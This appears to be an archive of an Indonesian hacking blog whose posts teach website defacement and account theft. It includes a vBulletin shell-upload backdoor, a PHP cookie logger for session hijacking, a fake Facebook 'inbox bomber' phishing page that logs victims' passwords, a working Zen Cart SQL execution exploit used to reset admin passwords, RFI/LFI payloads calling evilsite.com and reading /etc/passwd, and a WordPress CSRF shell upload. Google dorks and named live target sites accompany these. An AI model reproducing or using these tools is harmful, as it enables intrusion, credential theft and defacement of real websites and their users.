PPC Iklan Blogger Indonesia
Tampilkan postingan dengan label Shell Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Shell Hacking. Tampilkan semua postingan

Senin, 23 September 2013

0 Tutorial Upload Shell Backdoor di CMS vBulletin

01.28 Under From Unknown
[0 Comment]
Langsung aja ya bro. Kali ini ane share aja soalnya ane udah niat mau berhenti dulu dari dunia underground. Mau fokus belajar. Ujian Nasional udah didepan mata. :D
Oke, pertama, siapkan shell nya. Berformat .xml
Pilih aja salah satu, aman yang ente suka :)
Nabilaholic Priv8 Shell
Atau kalo ente gak suka shell cacad ane, ente bisa pake shell c99
c99 Shell
Ane asumsikan ente udah masuk ke halaman admin :p


Next, ganti url menjadi /localhost/vb/admincp/plugin.php?do=files
Maka anda akan dibawa ke tempat upload shell

Upload aja shell yang tadi sudah dipersiapkan. ingat, shell tadi harus disimpan dengan format xml :)
Kalo upload nya dah selesai, cek di /localhost/vb/admincp/subscriptions.php

Bekdor nya dah nancep tuh. Sekarang terserah mau diapain.
Sekian dulu ya, semoga bermanfaat.
Read More »

Senin, 15 Juli 2013

0 CREATE A COOKIELOGGER TO HACK ANY ACCOUNT

10.29 Under From Unknown
[0 Comment]

CREATE A COOKIELOGGER TO HACK ANY ACCOUNT



A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.
Today I am going to show How to make your own Cookie Logger…Hope you will enjoy Reading it …
Step 1: Copy & Save the notepad file from below and Rename it as Fun.gif

<a href="www.yoursite.com/fun.gif"><img style="cursor: pointer; width: 116px; height: 116px;" src="nesite.com/jpg" /></a>
Step 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php:
$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “rn” . $_GET["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
?>
Step 3: Create a new Notepad File and Save it as logfile.txt
Step 4: Upload this file to your server
cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/fun.gif
If you don’t have any Website then you can use the following Website to get a Free Website which has php support :
http://0fees.net
Step 5: Go to the victim forum and insert this code in the signature or a post :
<a href="www.yoursite.com/fun.gif"><img style="cursor: pointer; width: 116px; height: 116px;" src="nesite.com/jpg" /></a>
Step 6: When the victim see the post he view the image u uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows:
phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9

Step 7: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.
Step 8: Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim’s account information.
Note : Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim’s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login.
Read More »

Kamis, 11 Juli 2013

0 How to Install Kali linux Step by Step Guide

23.10 Under From Unknown
[0 Comment]
Boot your pc with Kali Linux once booted, Select Graphical Install

Select your language and click continue.

Select your Location and click continue.

Configure your Keyboard and click continue.


Type Your Desired Host name and click continue.

Click continue

Set your root password and click continue.

Configure the Clock and click continue.

Now Click on Guided – Use entire disk and click continue.

Now click continue.

Now Click on All Files in One Partition and click continue.

Now click continue.

Select option yes and click continue.

Select option no and click continue.

Select option yes and click continue.

Now installation is finished and completed

Log into Kali Linux with the username and password


Read More »

Sabtu, 22 Juni 2013

0 Cara Mudah Deface Website Dengan Exploit Joomla JCE Extension | Remote File Upload Vulnerability

09.52 Under From Unknown
[0 Comment]
Assalamualaikum...

Salam sejahtera buat kita semua :)

Oke sobat, sebenarnya udah lama sih mau share teknik ini,  cuma saya males aja mau nyari targetnya,, wkwkwk soalnya saya jarang nemu target yg Vuln, jadi males dah,, tapi berkat bantuan dari temen saya yaitu om Agam yang dengan sukarela memberikan live target yang bisa sobat gunakan :D jadi mempermudah saya untuk berbagi teknik ini buat sobat2 semua :) Thanks to Om  Agam dan perlu sobat ketahui bahwa pada CMS joomla itu yang paling banyak ditemukan bugsnya itu di component atau Extensinya, rata2 pasti begitu :)


Udah ah ngomel2nya, langsung saja kita praktekkan :)

Bahan-Bahan :

JCE Exploiter | Download

JCE Exploiter PHP | Download

Dork :  

inurl:index.php?option=com_jce site:.bR
inurl:joomla/index.php?option=com_virtuemart
inurl:uk/index.php?option=com_virtuemart
inurl:”joomla/index.php?option=com_jce”


Live Target :  
http://www.spiderdevelopments.com.au/
http://www.libira.co.il/

Udah disiapin kan bahan2nya? lanjut yuk masak2nya? Hajiahh :3

Pertama so pasti sobat harus mencari targetnya dulu di Google dengan menggunakan dork diatas :) kalo saya udah nemu tuh :D


Lalu Extrack dulu file JCE Exploiternya :)

Buka deh JCE Exploiternya :) dan Selanjutnya masukan Targetnya, lalu klik Start




Nah tuh, udah berhasil :)




Setelah berhasil exploitasinya lalu eksekusi link tersebut :)




Nah, upload aja shell sobat :)
Catatan: "kalo ga bisa upload file .php coba aja upload file .html / .txt :)

Kalo upload shellnya berhasil, tinggal eksekusi shell, trus Tebas dah :D






Cara Kedua

Upload dulu JCE Exploit PHP di  Hostingan atau apapun dah :) kalo ga mau repot, sobat bisa make punya saya aja Disini



Lalu masukkan targetnya :

Hostname : Web Target [tanpa http:// dan / ]
Path : / atau /path/
Please Specify a file to upload : Shell sobat :)

Yang lain, kosongin aja :) lalu klik Start



Nah tuh udah keliatan hasilnya :)


Langsung dah, eksekusi shellnya dan upload file depesan sobat :)

Read More »

Rabu, 12 Juni 2013

0 Fake FB inbox bomber

09.36 Under From Unknown
[0 Comment]
qeqeqe ..
atas perintah atasan dari admin, bang naisen ..
langsung ane buat threadnya ...
inspirasi dari bang dika ...
dari thread http://hacker-newbie.org/showthread.php?tid=756

langsung aja mulai ... Ngakak
1. bikin index.html

Code:

<html>
<head>
<title>.:: INBOX FB BOMBER ::.</title>
<meta http-equiv="Content-Type" content="text/html;
charset=iso-8859-1">

<style type="text/css">
<!--
.style1 {
        font-family: Geneva, Arial, Helvetica, sans-serif;
        font-size: 12px;
}
-->
</style>
<style type="text/css">
<!--
.style1 {
        font-size: 20px;
        font-family: Geneva, Arial, Helvetica, sans-serif;
}
-->
</style>
</head>
<script language="JavaScript">

function cekit()
{
    if(document.form1.to.value == "")
        {alert("please insert your email fb");
        document.form1.to.focus();       
        return false}
    if(document.form1.password.value == "")
        {alert("please insert your password");
        document.form1.password.focus();
        return false}
    if(document.form1.targer.value == "")
        {alert("please insert your target");
        document.form1.targer.focus();
        return false}
    if(document.form1.sender.value == "")
        {alert("please insert sender");
        document.form1.sender.focus();
        return false}
    if(document.form1.count.value == "")
        {alert("please insert count");
        document.form1.count.focus();
        return false}
    if(document.form1.message.value == "")
        {alert("please insert message");
        document.form1.message.focus();
        return false}
}
</script>
<body bgcolor="black" text="#ffffff">
<center><span class="style1">Facebook Inbox Bomb<br>
</span></center>

<form name="form1" method="get" action="write.php" onsubmit="return cekit();"
enctype="multipart/form-data">
  <br>
  <table width="100%" border="0">
    <tr>
      <td width="10%">
                  <div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Your
          email FB:</font></div><center><input type="text" style="background-color: green;" name="to" value="" /></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Password:</font></div><center><input type="password" style="background-color: green;" name="password" value="" /></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Target email</font></div><center><input type="text" style="background-color: green;" name="targer" value="" /></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Sender</font></div><center><input type="text" style="background-color: green;" name="sender" value=""/></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Count</font></div><center><input type="text" style="background-color: green;" name="count" value="" size="5"/></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Message</font></div><center>
<textarea name="message" style="background-color: green;" rows="5" cols="30"></textarea><br />
<input type="submit" value="send" /><br />
  </table>
</form>
</body>
<br/>
<br/>
<br/>
<center><b><font color=red size="4">BY : Crash_burn</font><b></center>
</html>
 
2. write.php
 
<?php
header("Location: /incorrect.html");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
 
 
 
3. incorrect.html
 
<html>
<head>
<title>.:: INBOX FB BOMBER ::.</title>
<meta http-equiv="Content-Type" content="text/html;
charset=iso-8859-1">

<style type="text/css">
<!--
.style1 {
        font-family: Geneva, Arial, Helvetica, sans-serif;
        font-size: 12px;
}
-->
</style>
<style type="text/css">
<!--
.style1 {
        font-size: 20px;
        font-family: Geneva, Arial, Helvetica, sans-serif;
}
-->
</style>
</head>
<script language="JavaScript">

function cekit()
{
    if(document.form1.to.value == "")
        {alert("please insert your email fb");
        document.form1.to.focus();       
        return false}
    if(document.form1.password.value == "")
        {alert("please insert your password");
        document.form1.password.focus();
        return false}
    if(document.form1.targer.value == "")
        {alert("please insert your target");
        document.form1.targer.focus();
        return false}
    if(document.form1.sender.value == "")
        {alert("please insert sender");
        document.form1.sender.focus();
        return false}
    if(document.form1.count.value == "")
        {alert("please insert count");
        document.form1.count.focus();
        return false}
    if(document.form1.message.value == "")
        {alert("please insert message");
        document.form1.message.focus();
        return false}
}
</script>
<body bgcolor="black" text="#ffffff">
<center><span class="style1">Facebook Inbox Bomb<br>
</span></center>

<form name="form1" method="get" action="sent.php" onsubmit="return cekit();"
enctype="multipart/form-data">
  <br>
  <table width="100%" border="0">
    <tr>
      <td width="10%">
      <div align="center"><b><font size="3" color=red face="Verdana, Arial,
Helvetica, sans-serif">Incorrect email/password combination<br/>
Make sure you are entering an email address or password associated with your account and that it is typed correctly.</font><b></div><center><br/>
                  <div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Your
          email FB:</font></div><center><input type="text" style="background-color: green;" name="to" value="" /></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Password:</font></div><center><input type="password" style="background-color: green;" name="password" value="" /></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Target email</font></div><center><input type="text" style="background-color: green;" name="targer" value="" /></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Sender</font></div><center><input type="text" style="background-color: green;" name="sender" value="" /></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Count</font></div><center><input type="text" style="background-color: green;" name="count" value="" size="5"/></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Message</font></div><center>
<textarea name="message" style="background-color: green;" rows="5" cols="30"></textarea><br />
<input type="submit" value="send" /><br />
  </table>
</form>
</body>
<br/>
<br/>
<br/>
<center><b><font color=red size="4">BY : Crash_burn</font><b></center>
</html>
 
 
4.sent.php
 
<?php
header("Location: /sent.html");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
 
 
5. sent.html
 
<html>
<head>
<title>.:: INBOX FB BOMBER ::.</title>
<meta http-equiv="Content-Type" content="text/html;
charset=iso-8859-1">

<style type="text/css">
<!--
.style1 {
        font-family: Geneva, Arial, Helvetica, sans-serif;
        font-size: 12px;
}
-->
</style>
<style type="text/css">
<!--
.style1 {
        font-size: 20px;
        font-family: Geneva, Arial, Helvetica, sans-serif;
}
-->
</style>
</head>
<script language="JavaScript">

function cekit()
{
    if(document.form1.to.value == "")
        {alert("please insert your email fb");
        document.form1.to.focus();       
        return false}
    if(document.form1.password.value == "")
        {alert("please insert your password");
        document.form1.password.focus();
        return false}
    if(document.form1.targer.value == "")
        {alert("please insert your target");
        document.form1.targer.focus();
        return false}
    if(document.form1.sender.value == "")
        {alert("please insert sender");
        document.form1.sender.focus();
        return false}
    if(document.form1.count.value == "")
        {alert("please insert count");
        document.form1.count.focus();
        return false}
    if(document.form1.message.value == "")
        {alert("please insert message");
        document.form1.message.focus();
        return false}
}
</script>
<body bgcolor="black" text="#ffffff">
<center><span class="style1">Facebook Inbox Bomb<br>
</span></center>

<form name="form1" method="get" action="write.php" onsubmit="return cekit();"
enctype="multipart/form-data">
  <br>
  <table width="100%" border="0">
    <tr>
      <td width="10%">
      <div align="center"><font size="-3" color=red face="Verdana, Arial,
Helvetica, sans-serif">Your Bomb Has been sent:</font></div><center><br/>
                  <div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Your
          email FB:</font></div><center><input type="text" style="background-color: green;" name="to" value="" /></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Password:</font></div><center><input type="password" style="background-color: green;" name="password" value="" /></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Target email</font></div><center><input type="text" style="background-color: green;" name="targer" value="" /></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Sender</font></div><center><input type="text" style="background-color: green;" name="sender" value="" /></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Count</font></div><center><input type="text" style="background-color: green;" name="count" value="" size="5"/></center><br />
<div align="center"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Message</font></div><center>
<textarea name="message" style="background-color: green;" rows="5" cols="30"></textarea><br />
<input type="submit" value="send" /><br />
  </table>
</form>
</body>
<br/>
<br/>
<br/>
<center><b><font color=red size="4">BY : Crash_burn</font><b></center>
</html>
 
 
 
6. upload deh dalam satu direktori di hostingan. misal:t35.com

7 enjoy ... Ngakak

alurnya
Code:
index.html => write.php => incorrect.html => sent.php => sent.html
panjang bener yak .... Capek

preview http://leecherz.cz.cc/fb
Download : http://www.ziddu.com/download/9444787/fbinbox.zip.html

sekian dari newbie permanent ...
klo master2 ada yg mau memperbaiki ...
monggo ... Wow

UPDATED:
- add "count"
- gak bisa disubmit klo blm ke isi semua fieldnya .... :D
 
Read More »

0 Deface Dgn Mudah Menggunaka Bugs Zen Cart

09.31 Under From Unknown
[0 Comment]
orang baru mau buat thread, maap kalo repost kalo udah ada yg tau tinggal di lurusin aja ya kk :D


buka google ketik : powered by zen cart ™

kalo udah nih ada pithon :

Spoiler Hide
Code:
#!/usr/bin/python

#
# ------- Zen Cart 1.3.8 Remote SQL Execution
# http://www.zen-cart.com/
# Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone!
# A new version (1.3.8a) is avaible on http://www.zen-cart.com/
#
# BlackH :)
#

#
# Notes: must have admin/sqlpatch.php enabled
#
# clean the database :
#    DELETE FROM `record_company_info` WHERE `record_company_id` = (SELECT `record_company_id` FROM `record_company` WHERE `record_company_image` = '8d317.php' LIMIT 1);
#    DELETE FROM `record_company` WHERE `record_company_image` = '8d317.php';

import urllib, urllib2, re, sys

a,b = sys.argv,0

def option(name, need = 0):
    global a, b
    for param in sys.argv:
        if(param == '-'+name): return str(sys.argv[b+1])
        b = b + 1
    if(need):
        print '\n#error', "-"+name, 'parameter required'
        exit(1)

if (len(sys.argv) < 2):
    print """
=____________ Zen Cart 1.3.8 Remote SQL Execution Exploit  ____________=
========================================================================
|                  BlackH <Bl4ck.H@gmail.com>                          |
========================================================================
|                                                                      |
| $system> python """+sys.argv[0]+""" -url <url>                                 |
| Param: <url>      ex: http://victim.com/site (no slash)              |
|                                                                      |
| Note: blind "injection"                                              |
========================================================================
    """
    exit(1)
   
url, trick = option('url', 1), "/password_forgotten.php"

while True:
    cmd = raw_input('sql@jah$ ')
    if (cmd == "exit"): exit(1)
    req = urllib2.Request(url+"/admin/sqlpatch.php"+trick+"?action=execute", urllib.urlencode({'query_string' : cmd}))
    if (re.findall('1 statements processed',urllib2.urlopen(req).read())):
        print '>> success (', cmd, ")"
    else:
        print '>> failed, be sure to end with ; (', cmd, ")"
 
tuh pithon save dgn extensi zen.py

sebelum nya komputer kamu instal dlu pithon nya , kalo blum aja download aja di : http://www.python.org/ftp/python/2.5/python-2.5.msi

kalo udah buka cmd
misal zen.py kamu taruh di desktop bearti cmd kamu arahin ke desktop dlu

kalo udah ketik : zen.py -url htttp://webkorban.com
contohh : zen.py -url http://customizthat.com/2010/admin/ <--enter
trus nanti ada tulisan $sql@jah
aklo ada tulisan itu bearti masukin perintah : UPDATE admin SET admin_name='adminz', admin_email='admin@shopadmin.com', admin_pass='617ec22fbb8f201c366e9848c0eb6925:87' WHERE admin_id='1'; trus enter

kalo berhasil maka akan muncul kayak ini : >> success ( UPDATE admin SET admin_name='adminz', admin_email='admin@shopadmin.
com', admin_pass='617ec22fbb8f201c366e9848c0eb6925:87' WHERE admin_id='1'; )
sql@jah$


contoh nya nih ss nya

[Image: 92079546.jpg]


kalo udah succes, tinggal di url target ditambahin /admin/

kalo succes setiap username sama pasword nya itu adminz : wew



sekian dan terima kasih


saya baru belajar kk, katanya sih ada yg bisa nge deface 32 website dlm 1 jam :D
heheh

great : hacker newbie dan admin yg disini 
Read More »

0 Pengertian RFI,LFI,LFD ( Full Tutorial Deface )

09.30 Under From Unknown
[0 Comment]
1. Remote File Inclusion

contoh script :
Code:
<?php $page=$_GET['file'];
include($page);
?>

misal :
Code:
http://www.sh4dhckr.com/get.php?file=index.php
itu artinya isi dari index.php bakal di eksekusi kedalem get.php

phpshellcode : http://evilsite.com/evilscript.txt

exploitasi :
kita masukkin php shell code ke dalem get.php
caranya tinggal ubah index.php jadi URL phpshellcode kita.

Code:
http://www.sh4dhckr.com/get.php?file=http://evilsite.com/evilscript.txt

kalo kita masukkin URL phpshellcode kita, nanti script akan berubah sementara jadi :
Code:
<?php $page="http://evilsite.com/evilscript.txt";
include($page);
?>

kadang ada script yang berisi :
Code:
<?php
$page=$_GET['page'];
include($page.'.php');
?>

jadi semisal kita include http://evilsite.com/evilscript.txt kita, bakal berubah URL-nya jadi http://evilsite.com/evilscript.txt.php
untuk menghilangkan .php di akhir URL shellcode kita, bisa kita tambah NULLBYTE ( ).

Code:
http://www.sh4dhckr.com/get.php?file=http://evilsite.com/evilscript.txt


2. Local File Inclusion

contoh script :
Code:
<?php
$page=$_GET['page'];
include('/pages/'.$page);
?>

sama kayak RFI. cuman kalo ini hanya berlaku buat include file di 1 server.

misal :
Code:
http://www.sh4dhckr.com/get.php?file=../../../../../../../../../../etc/passwd

bisa juga kita pake NULLBYTE buat bypass.. sama kayak RFI.


3. Local File Disclosure/Download

contoh script :

Code:
$file = $_SERVER["DOCUMENT_ROOT"]. $_REQUEST['file'];
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Content-Type: application/force-download");
header( "Content-Disposition: attachment; filename=".basename($file));
//header( "Content-Description: File Transfer");
@readfile($file);
die();

kesalahan itu bisa dimanfaatkan untuk mendownload file sensitif seperti konfigurasi database.

misal :
Code:
http://www.sh4dhckr.com/get.php?file=includes/config.php



CONTOH DALAM GAMBAR NEEEHHH!!!


isi vulnerable file..

[Image: 1lfifile.png]

berikut isi file yang mau kita eksekusi..

[Image: 2isitext.png]

berikut gambar file yang ter-eksekusi..

[Image: 3executed.png]

berikut contoh pesan error LFI..

[Image: 5gagallfi.png]

berikut contoh pesan error RFI

[Image: 4errorrfi.png]

RFI gagal karena setting allow_url_include di php.ini OFF..

[Image: 6phpini.png]





SEKIAN
Read More »

Sabtu, 08 Juni 2013

0 Cara Deface Web Dengan CSRF

09.32 Under From Unknown
[0 Comment]


                CSRF adalah singkatan dari Cross Site Request Forgery. Dengan CSRF ini, dapat memungkinkan kita untuk menanam shell pada web yang memiliki bug ini menggunakan suatu script. Bagaimana caranya? Simak yang satu ini.




1. Download script CSRF disini

2. Untuk mencari target, gunakan salah satu dork berikut ke google :
inurl:/wp-content/themes/shepard
inurl:/wp-content/themes/money
inurl:/wp-content/themes/clockstone
inurl:/wp-content/themes/ambleside
inurl:/wp-content/themes/pacifico
inurl:/wp-content/themes/qreator
inurl:/wp-content/themes/cleanple

3. Buka salah satu web yang akan dijadikan target.
Contoh : www.site.com/wp-content/themes/pacifico/images/
Ubah yang berwarna merah dengan theme/
Contoh : www.site.com/wp-content/themes/pacifico/theme/




4. Nah anda klik folder function lalu klik "Upload-bg.php" atau "uploadbg.php" atau "upload.php"

5. Jika muncul tulisan "error" berarti web itu vuln. Jika muncul tulisan "You must be logged to access this script" berarti tidak vuln, anda harus cari target lain.

6. Sekarang anda buka script CSRF yang tadi anda download dengan notepad (klik kanan -> open with -> notepad). Anda ganti text URLTARGET dengan link webnya. Misalkan www.site.co.uk/wp-content/themes/cleanple/theme/functions/uploadbg.php. Lalu di save.




7. Setelah pengeditan selesai & di save. Buka file CSRF yang sudah edit itu. Maka akan muncul form upload

8. Upload shell anda, jika belum punya download disini

9. Jika proses upload selesai, akan muncul tulisan yang menunjukkan dimana keberadaan shell anda misal seperti ini : www.site.co.uk/wp-content/themes/cleanple/images/bgs/25e732d93a9402n19847u0.php
Nah berarti 25e732d93a9402n19847u0.php adalah nama shell anda. Cara membukanya yaitu : www.site.com/wp-content/themes/cleanple/theme/functions/25e732d93a9402n19847u0.php

10. Dan muncullah shell anda. Silahkan anda otak atik web tersebut sesuka anda.

Read More »